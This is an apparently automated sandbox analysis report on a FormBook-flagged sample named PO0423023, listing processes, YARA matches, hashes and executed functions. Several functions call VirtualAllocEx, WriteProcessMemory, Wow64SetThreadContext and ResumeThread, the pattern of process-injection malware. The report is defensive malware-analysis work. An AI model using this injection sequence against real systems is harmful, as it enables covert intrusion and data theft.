Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3262815289.00000000038C0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.3262815289.00000000038C0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3262551392.00000000036A0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.3262551392.00000000036A0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3261184136.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.3261184136.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	8
Start time:	08:38:19
Start date:	23/04/2024
Path:	C:\Program Files (x86)\BfhsBJESSmvrxvvTUcmuRbsoDWHhTcMOtxhWkIEDZkirMcGdurpwUW\uFKwxSqRZbIimWVtjS.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\BfhsBJESSmvrxvvTUcmuRbsoDWHhTcMOtxhWkIEDZkirMcGdurpwUW\uFKwxSqRZbIimWVtjS.exe"
Imagebase:	0x90000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.3265262776.0000000005940000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.3265262776.0000000005940000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	9
Start time:	08:38:32
Start date:	23/04/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\Firefox.exe"
Imagebase:	0x7ff79f9e0000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	9.2%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	238
Total number of Limit Nodes:	11

Executed Functions

Function 044D1400 Relevance: .4, Instructions: 401COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2034961763.00000000044D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_44d0000_PO0423023.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 38bdf33912791e006b09fce35b1528f7e7fdb8c64395998c4de02b8347230e89
Instruction ID: ad7a7789d36d2a40d43fa2176bbce25439f84f1dfed7becb64c55e6251be9b48
Opcode Fuzzy Hash: 38bdf33912791e006b09fce35b1528f7e7fdb8c64395998c4de02b8347230e89
Instruction Fuzzy Hash: 26E1BC30B016049FEB25DB76C560BAEB7FAAF89700F1444AEE5069B392DF74E901CB51

Uniqueness

Uniqueness Score: -1.00%

Function 09488048 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2040466365.0000000009480000.00000040.00000800.00020000.00000000.sdmp, Offset: 09480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9480000_PO0423023.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 851ad300ee0f84c136aeffcaba25fd19660d3b9544927c79fa828e70765a24e3
Instruction ID: d8895378be6f2b73acbbe5b979958f65cbacd15efa44f0bec30a6752bf46f006
Opcode Fuzzy Hash: 851ad300ee0f84c136aeffcaba25fd19660d3b9544927c79fa828e70765a24e3
Instruction Fuzzy Hash: E021F4B0D006588BDB18DFABD8442AEFBF7AFC9300F54C52AD429AA354EB750946CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00BBD051 Relevance: 6.1, APIs: 4, Instructions: 130
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00BBD0DE
GetCurrentThread.KERNEL32 ref: 00BBD11B
GetCurrentProcess.KERNEL32 ref: 00BBD158
GetCurrentThreadId.KERNEL32 ref: 00BBD1B1

Memory Dump Source

Source File: 00000000.00000002.2030882898.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_PO0423023.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 12f0b4d7d2e986faa0115186edbeb8bde1d00b32d64528e2ca66f36e052ce8b6
Instruction ID: eae50499223d67fd73dd5006ace780a29498bd1c9f41c37f32407a2bff0162f2
Opcode Fuzzy Hash: 12f0b4d7d2e986faa0115186edbeb8bde1d00b32d64528e2ca66f36e052ce8b6
Instruction Fuzzy Hash: EB5145B09013498FDB14EFA9D548BAEBFF1EF48304F208069D419A7261D778A984CF65

Uniqueness

Uniqueness Score: -1.00%

Function 00BBD060 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00BBD0DE
GetCurrentThread.KERNEL32 ref: 00BBD11B
GetCurrentProcess.KERNEL32 ref: 00BBD158
GetCurrentThreadId.KERNEL32 ref: 00BBD1B1

Memory Dump Source

Source File: 00000000.00000002.2030882898.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_PO0423023.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: f0610340a4704d3022c29cc7094f1cb55eb5655ffc0399daa93082d2b661c043
Instruction ID: 542cefaa444c676ef25611f1b8a34da9344d68114fd2a8afef15151ba2c9f74a
Opcode Fuzzy Hash: f0610340a4704d3022c29cc7094f1cb55eb5655ffc0399daa93082d2b661c043
Instruction Fuzzy Hash: D25135B09013099FDB14EFAAD548BEEBBF5EF48304F20C469D419A7360D778A984CB65

Uniqueness

Uniqueness Score: -1.00%

Function 0948DED4 Relevance: 1.8, APIs: 1, Instructions: 251
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0948E116

Memory Dump Source

Source File: 00000000.00000002.2040466365.0000000009480000.00000040.00000800.00020000.00000000.sdmp, Offset: 09480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9480000_PO0423023.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: bd5c1711916b94b7b60ddb08a8d8004d7dc3fea97a67d8ca1fefe96a89aa6008
Instruction ID: 9722df13f2518231a7c62eecfa312ab08ea8f4568c5b739611bf70d6ac7bf70a
Opcode Fuzzy Hash: bd5c1711916b94b7b60ddb08a8d8004d7dc3fea97a67d8ca1fefe96a89aa6008
Instruction Fuzzy Hash: FAA15D71D00619CFEB24EF68C8417EFBBB2BF45314F14856AE818A7280DB759985CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0948DEE0 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0948E116

Memory Dump Source

Source File: 00000000.00000002.2040466365.0000000009480000.00000040.00000800.00020000.00000000.sdmp, Offset: 09480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9480000_PO0423023.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 8a3cba7d9a52250df6dbde6a78bc3eda66007a83dbb7d562a67f4a6e5ee1656a
Instruction ID: 73626a8cd6451af10c9f9d9e18be4aa2a5bd2296376fc6e07f30b4ea6c35d625
Opcode Fuzzy Hash: 8a3cba7d9a52250df6dbde6a78bc3eda66007a83dbb7d562a67f4a6e5ee1656a
Instruction Fuzzy Hash: 56914C71D00219CFDB24EF68C8417EFBBB2BF45314F1485AAE818A7290DB759985CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00BBADC8 Relevance: 1.7, APIs: 1, Instructions: 198
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 00BBB01E

Memory Dump Source

Source File: 00000000.00000002.2030882898.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_PO0423023.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: fe2fd4400b23ede45852f7f8be63488e6da111e754b1f1a524696b36b34efc11
Instruction ID: f6038e601f28462bbda0059a33ab91356059e5ed0e6d1a29e3c8155db1762efb
Opcode Fuzzy Hash: fe2fd4400b23ede45852f7f8be63488e6da111e754b1f1a524696b36b34efc11
Instruction Fuzzy Hash: A6716870A00B058FDB24DF29D4557AABBF1FF88300F10896EE44AD7A50D7B5E949CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00BB5A84 Relevance: 1.6, APIs: 1, Instructions: 105
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.2030882898.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_PO0423023.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7dcdb5aa0fd53f00dce052b1542a9960d313d6fdb3450a0417a774116cc91738
Instruction ID: 8f8d0ae43ad60a0b6d3c961fd7c25cc9f72427cac4a28071847b052a3d5d047e
Opcode Fuzzy Hash: 7dcdb5aa0fd53f00dce052b1542a9960d313d6fdb3450a0417a774116cc91738
Instruction Fuzzy Hash: 8F31D175805A48CFCB21CFA8C8857EDBBF0EF46314F24828AC055AB255C7B5A94ACF52

Uniqueness

Uniqueness Score: -1.00%

Function 00BB590C Relevance: 1.6, APIs: 1, Instructions: 102
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 00BB59C9

Memory Dump Source

Source File: 00000000.00000002.2030882898.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_PO0423023.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 1f6d7669af632d16e2d4eb272cd41ab5c7b7e73215d7390c7f0ffd46ca484ab0
Instruction ID: c3ff8563de3ee11f1b101d090dab36623bf8292b82c48ee68536ed34a31016ac
Opcode Fuzzy Hash: 1f6d7669af632d16e2d4eb272cd41ab5c7b7e73215d7390c7f0ffd46ca484ab0
Instruction Fuzzy Hash: A741EDB1C00619CBDB24CFA9C884BDDBBB5FF49304F20806AD408AB251DBB56986CF91

Uniqueness

Uniqueness Score: -1.00%

Function 00BB44B4 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 00BB59C9

Memory Dump Source

Source File: 00000000.00000002.2030882898.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_PO0423023.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 752eb876060b5b1c3a6f786ed3d2f4c786e247b0e2ae16823a38b0861a8e25fe
Instruction ID: b61b2767f1d6a978e04cf2e8005055eb127d3161b4588a7fc347b2891259f3dd
Opcode Fuzzy Hash: 752eb876060b5b1c3a6f786ed3d2f4c786e247b0e2ae16823a38b0861a8e25fe
Instruction Fuzzy Hash: 9441EEB1C00A19CBDB24CFA9C884BDDBBF5BF49304F20806AD409AB251DBB56946CF91

Uniqueness

Uniqueness Score: -1.00%

Function 0948DC51 Relevance: 1.6, APIs: 1, Instructions: 73
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0948DCE8

Memory Dump Source

Source File: 00000000.00000002.2040466365.0000000009480000.00000040.00000800.00020000.00000000.sdmp, Offset: 09480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9480000_PO0423023.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 319c1fdf0b50b6ed0fc19a78745b91a80dc2fae5e3e49f449315df9c92d7c3b8
Instruction ID: d61aaf4ab0cadb362ecc515c3e4568c49e3f07651825c079d8682e9e34ea0955
Opcode Fuzzy Hash: 319c1fdf0b50b6ed0fc19a78745b91a80dc2fae5e3e49f449315df9c92d7c3b8
Instruction Fuzzy Hash: 2B2128B5D002499FDB10DFA9C9857DEBBF5FF48310F10842AE919A7290D7789545CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0948DC58 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0948DCE8

Memory Dump Source

Source File: 00000000.00000002.2040466365.0000000009480000.00000040.00000800.00020000.00000000.sdmp, Offset: 09480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9480000_PO0423023.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: abc4adb09f79d49be113bbfd9fdd12c64964d7193038e7efc908b32195f5db3b
Instruction ID: 27c7ce81a18f8571451e6db45d3ff276398825ac47e59d4299aaf9a59395866d
Opcode Fuzzy Hash: abc4adb09f79d49be113bbfd9fdd12c64964d7193038e7efc908b32195f5db3b
Instruction Fuzzy Hash: 02210AB5D003499FCB10DFA9C945BDEBBF5FF48310F10842AE919A7290D7789545CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0948DAB8 Relevance: 1.6, APIs: 1, Instructions: 68
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0948DB3E

Memory Dump Source

Source File: 00000000.00000002.2040466365.0000000009480000.00000040.00000800.00020000.00000000.sdmp, Offset: 09480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9480000_PO0423023.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 4fc7957fbd19a66b219a7551f92fb316530642e7bd1e12c9b0f04f30c613d1e5
Instruction ID: f924142cfae5ecda2ed974af5ed2c1352d39ca3fe60106c03a291f94b8caeea5
Opcode Fuzzy Hash: 4fc7957fbd19a66b219a7551f92fb316530642e7bd1e12c9b0f04f30c613d1e5
Instruction Fuzzy Hash: EC213871D002498FDB10DFAAC4857EEBBF5FF89364F14842AD559AB280CB789945CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 0948DD41 Relevance: 1.6, APIs: 1, Instructions: 67
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0948DDC8

Memory Dump Source

Source File: 00000000.00000002.2040466365.0000000009480000.00000040.00000800.00020000.00000000.sdmp, Offset: 09480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9480000_PO0423023.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 83079e0b47ea1718bc2a2450794c4b3cf1505a7909a97fd0aee1101f668a87f9
Instruction ID: 04dc8c10b371e0e7897af40abedb2b480eb9a7016150f114a9c2f82b19ceee1c
Opcode Fuzzy Hash: 83079e0b47ea1718bc2a2450794c4b3cf1505a7909a97fd0aee1101f668a87f9
Instruction Fuzzy Hash: 642137B1C002499FDB10DFAAC881AEEFBF5FF48310F10842AE959A7250C7789941DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0948DAC0 Relevance: 1.6, APIs: 1, Instructions: 63
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0948DB3E

Memory Dump Source

Source File: 00000000.00000002.2040466365.0000000009480000.00000040.00000800.00020000.00000000.sdmp, Offset: 09480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9480000_PO0423023.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 0be7820eda521b9d116b3080b6b8c364ca015d571eed8f83354cc259a8859f30
Instruction ID: fa2e80da19ce0c78db79bb1649fb919f0e97694a4a71bb63bec1567c82104031
Opcode Fuzzy Hash: 0be7820eda521b9d116b3080b6b8c364ca015d571eed8f83354cc259a8859f30
Instruction Fuzzy Hash: 1C211871D002098FDB10DFAAC485BEFBBF5EF49314F14842AD519A7280CB78A945CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0948DD48 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0948DDC8

Memory Dump Source

Source File: 00000000.00000002.2040466365.0000000009480000.00000040.00000800.00020000.00000000.sdmp, Offset: 09480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9480000_PO0423023.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 85759af42f8581824945041bf035171b61d4657aa55c3a9dfae6262116457d63
Instruction ID: 97e568b2b100a4122216de00d0ad346bbdebf9a36c5e283a10c98acbd0a4336b
Opcode Fuzzy Hash: 85759af42f8581824945041bf035171b61d4657aa55c3a9dfae6262116457d63
Instruction Fuzzy Hash: 5E2109B1D003499FCB10DFAAC845AEEFBF5FF48310F50842AE519A7250C7789545DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00BBD6B0 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00BBD737

Memory Dump Source

Source File: 00000000.00000002.2030882898.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_PO0423023.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: dd960f1addbf0163c519503af7128c741bddd56f90196c4906c42b944d841972
Instruction ID: 9ce028dcef38aa0503207cc2c81c7d15bd7699155196e4bebfef4595b1884563
Opcode Fuzzy Hash: dd960f1addbf0163c519503af7128c741bddd56f90196c4906c42b944d841972
Instruction Fuzzy Hash: B121C4B59002489FDB10CF9AD984AEEBBF9FB48310F14845AE918A3350D378A944CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00BBD6A9 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00BBD737

Memory Dump Source

Source File: 00000000.00000002.2030882898.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_PO0423023.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 5ed8f08429bb85edab710703cd53ab32d5d5ebe536f085cbe6443716b67fdf3c
Instruction ID: b10d78e99ce6a5eba02f1408d8f5156f8bd05b5429158a14e0b1847ea8dbb62d
Opcode Fuzzy Hash: 5ed8f08429bb85edab710703cd53ab32d5d5ebe536f085cbe6443716b67fdf3c
Instruction Fuzzy Hash: FA21E0B5900248DFDB10CFAAD984AEEBFF5EB48310F14845AE958A7250D378A941CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 0948DB90 Relevance: 1.6, APIs: 1, Instructions: 58memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0948DC06

Memory Dump Source

Source File: 00000000.00000002.2040466365.0000000009480000.00000040.00000800.00020000.00000000.sdmp, Offset: 09480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9480000_PO0423023.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: aab75709ff7c18c6bec412ffe688535c1857a6575c3e01db180b80db275e56af
Instruction ID: 86785e466b1fa720515e92bd85ef016b4f638414b4d554c5c59eb58f5f2e6b82
Opcode Fuzzy Hash: aab75709ff7c18c6bec412ffe688535c1857a6575c3e01db180b80db275e56af
Instruction Fuzzy Hash: D91159719002498FCB10EFAAC8456DFBFF5EF58320F108419E519A7250C7799541CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00BBA150 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00BBB099,00000800,00000000,00000000), ref: 00BBB2AA

Memory Dump Source

Source File: 00000000.00000002.2030882898.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_PO0423023.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 08f05ae79fdee8001fe1c33531c0f025dac2e516804b4717bf5295e3690cf455
Instruction ID: 512d8e163ae23d9c9830b9902386a94ebd983acb678530e89bbf42830b2d1257
Opcode Fuzzy Hash: 08f05ae79fdee8001fe1c33531c0f025dac2e516804b4717bf5295e3690cf455
Instruction Fuzzy Hash: 2A11F6B69003099FDB14DF9AC844AEEFBF4EF48310F10846AD519B7210C3B9A945CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00BBB238 Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00BBB099,00000800,00000000,00000000), ref: 00BBB2AA

Memory Dump Source

Source File: 00000000.00000002.2030882898.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_PO0423023.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: c3619e9732f80ba56f28b8829b86daef69059a35c4832c7d9c3793d3a4197386
Instruction ID: ca11e62403d0a408cc7a991ad06d93f67d277e6f80ee7f91787140384fca03ca
Opcode Fuzzy Hash: c3619e9732f80ba56f28b8829b86daef69059a35c4832c7d9c3793d3a4197386
Instruction Fuzzy Hash: F21126B6D002098FDB10DFAAC884ADEFBF4EF48310F10845AD419B7610C3B8A545CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 0948DA08 Relevance: 1.6, APIs: 1, Instructions: 54threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 0948DA72

Memory Dump Source

Source File: 00000000.00000002.2040466365.0000000009480000.00000040.00000800.00020000.00000000.sdmp, Offset: 09480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9480000_PO0423023.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 2bb8c12f05aab6f68b8068abf63b02b0d980da2cb930d7952af16392a248b98b
Instruction ID: 8d425db43185e1759bd8e33fae4fece85e05c8cfb0c1b7a8d5d0d7565a93ce3a
Opcode Fuzzy Hash: 2bb8c12f05aab6f68b8068abf63b02b0d980da2cb930d7952af16392a248b98b
Instruction Fuzzy Hash: 0A116DB1D002498FDB20DFAAC4457DFFBF4EF58320F20841AD459A7240CB789945CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0948DB98 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0948DC06

Memory Dump Source

Source File: 00000000.00000002.2040466365.0000000009480000.00000040.00000800.00020000.00000000.sdmp, Offset: 09480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9480000_PO0423023.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 748a4d1a4c858de4662f86fe7fc980c94477ceb1138207d218ecc79a07cdbdd2
Instruction ID: 2661761640fb19cdefb69913d42b0fea7018fdab60f8e83f0f315e920ec04a2c
Opcode Fuzzy Hash: 748a4d1a4c858de4662f86fe7fc980c94477ceb1138207d218ecc79a07cdbdd2
Instruction Fuzzy Hash: A51137759002499FCB10EFAAC844AEFFFF5EF48320F10841AE519A7250C779A940CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 044D1E50 Relevance: 1.6, APIs: 1, Instructions: 51COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(?), ref: 044D1EB0

Memory Dump Source

Source File: 00000000.00000002.2034961763.00000000044D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_44d0000_PO0423023.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 62e6b4600c4d3285662bcbaa10601fbde7df2858ecabe22981cc0c8d20e6a059
Instruction ID: 8690b4c8a14e398704e681be1c57a504e69db7bdc6671b9aaa4448aa3becfd4a
Opcode Fuzzy Hash: 62e6b4600c4d3285662bcbaa10601fbde7df2858ecabe22981cc0c8d20e6a059
Instruction Fuzzy Hash: 1F1125B58006498FDB20DF9AC544BEFBBF4EF48320F20841AD959A7340C738A585CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0948DA10 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 0948DA72

Memory Dump Source

Source File: 00000000.00000002.2040466365.0000000009480000.00000040.00000800.00020000.00000000.sdmp, Offset: 09480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9480000_PO0423023.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: f61f0f28d4d484e81bf1c0750e5b182d783a33619b8f621dc4fc5a0c22c7af4e
Instruction ID: 33c9184af41158ebd350f4468f3544a0c4c9e6ffebadb88c3541d8b2dddb028a
Opcode Fuzzy Hash: f61f0f28d4d484e81bf1c0750e5b182d783a33619b8f621dc4fc5a0c22c7af4e
Instruction Fuzzy Hash: 7C113AB1D002488FCB20DFAAC4457EFFBF9EF99324F20841AD519A7250CB79A544CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00BBAFB8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 00BBB01E

Memory Dump Source

Source File: 00000000.00000002.2030882898.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_PO0423023.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 5f4e7e0b29764e5a9aaf7d3aca21edf113cb8ac3a09d6cfb01a0f8f2ba8f7609
Instruction ID: 4cf6bc80f6ddbbc690e62740f204d7c15fd3a354d2c8758f7be4ad7f12dcf323
Opcode Fuzzy Hash: 5f4e7e0b29764e5a9aaf7d3aca21edf113cb8ac3a09d6cfb01a0f8f2ba8f7609
Instruction Fuzzy Hash: 7311DFB6C006498FCB20DF9AD444AEEFBF4EB88314F10845AD929A7210D3B9A545CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 044D1E58 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(?), ref: 044D1EB0

Memory Dump Source

Source File: 00000000.00000002.2034961763.00000000044D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_44d0000_PO0423023.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 0f16f4476e1ac21443ede3639669a54b47d6c534066209506dfee003efbb1d5e
Instruction ID: 68784848969d9229f4b4f7c57a4b629ea12756779ff6cba4158efbe77f55a6ae
Opcode Fuzzy Hash: 0f16f4476e1ac21443ede3639669a54b47d6c534066209506dfee003efbb1d5e
Instruction Fuzzy Hash: 461103B58002498FDB20DF9AC545BDEBBF4EF48320F10841AD958A7340D738A584CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 044D06C1 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 044D0725

Memory Dump Source

